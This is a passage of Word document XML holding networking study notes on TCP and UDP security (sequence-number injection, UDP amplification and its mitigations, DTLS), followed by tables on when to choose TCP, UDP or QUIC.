    <w:p w14:paraId="52F1D368" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sequence numbers make it difficult (not impossible) to inject data into an existing connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22482AEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>An attacker must guess the current sequence number (32-bit space).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3A063" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>With TLS on top: impossible to inject meaningful data (encrypted + MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CCB16" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 UDP Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17CBA7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP Amplification/Reflection Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DECBC81" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Attacker sends small UDP query with spoofed source IP (victim's IP) to a reflector (e.g., DNS server, NTP server, memcached).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E087DD9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Reflector sends LARGE response to the victim's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0D7A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Amplification factor: 50–100x (60-byte query → 3000+ byte response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED279D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Victim is flooded with traffic they never requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391569A2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP is vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05823D27" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No handshake → source IP is trivially spoofable (can't verify the sender actually exists).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7070B7B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>TCP is resistant because the 3-way handshake verifies the source IP can receive packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F44CA50" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D122903" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>BCP38 (ISP-level): Block outgoing packets with spoofed source IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC6302" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Response Rate Limiting: DNS/NTP servers limit responses per source IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F1494" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Disable unnecessary UDP services (memcached should never be internet-facing on UDP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033524DF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DTLS (Datagram Transport Layer Security):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D42DD8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>TLS adapted for UDP datagrams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF7F1A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Provides encryption, authentication, integrity for UDP-based protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBEBCC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Used by: WebRTC (DTLS + SRTP), OpenVPN (optional), CoAP (IoT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1EBEB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Adds a cookie exchange to prevent amplification (similar to TCP's handshake verifying the source).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84651F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="481A3481">
          <v:rect id="_x0000_i5024" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55282C6E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Choosing Between TCP and UDP — Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D4D75" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Use TCP When:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4364"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="0CF4DC5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D13EA6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>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5D222D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5056236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B602CF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>All data must arrive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96916E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Retransmission guarantees delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="187816D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9A1BDD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Data must be in order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2BAC27" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Sequence numbers + reordering buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="3D00E2F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119C5C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>You're building on HTTP/gRPC/WebSocket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A8563C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>These require TCP (or QUIC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="23EF36B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10B74F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Bidirectional streaming with reliability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5542C5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>TCP handles this natively</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="21662CC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12D855" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>You need built-in congestion control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020428" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>TCP won't overwhelm the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5F57BBE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CFA0C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection state is acceptable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57189B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Client count is manageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="0A03EC5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CFDB8A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:lastRenderedPageBreak/>
              <w:t>Latency variability is acceptable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262270" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Retransmissions cause jitter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="538EB4A6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Use UDP When:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3951"/>
        <w:gridCol w:w="4208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="4CDA123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B5257D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>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6BF670" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="7477A61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F96E31" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Real-time latency is critical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054011" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>No retransmission delays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="1ED1C9C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2B98FF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Stale data is useless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9943FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Latest update supersedes lost ones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="10BBEA1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35B55F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Some data loss is acceptable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7BE98F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Audio/video tolerates 1–5% loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2699643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1057B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Broadcasting/multicasting needed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01B569" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>UDP supports multicast; TCP doesn't</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2C98426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A79C53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connectionless model fits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251B61" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Millions of "clients" with no state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="21BE223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389EBE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Minimal overhead needed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2ECEBD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8-byte header, no handshake</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="736FCDD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32A378" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Custom reliability semantics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B5FB20" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Build exactly what you need</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="053887D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39B649" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Kernel bypass / ultra-low-latency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12D313" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>UDP is simpler to process in DPDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64BF704F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Use QUIC When:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4585"/>
        <w:gridCol w:w="4765"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="692F092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446B8E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>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DEECCC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why QUIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="4113180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7EFC1A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Reliability needed WITHOUT HOL blocking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9A509B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Per-stream ordering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="0CD1DF7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8CEC6E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Fast connection establishment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56FA6B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>0–1 RTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="1D39AAB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77D217" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Mobile users switching networks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C3BD16" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="51C4AC0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571163" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Multiplexed streams with independence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42D3D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Each stream is isolated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="721C809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085DBE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:lastRenderedPageBreak/>
              <w:t>Need encryption everywhere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00E34B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>TLS 1.3 is built-in, mandatory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="1A4EF6A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7E5668" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Deploying over ossified networks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C5B21D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Middleboxes can't interfere (encrypted UDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="625A134D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="305D07D7">
          <v:rect id="_x0000_i5025" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3639D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Hybrid Approaches in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31546D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
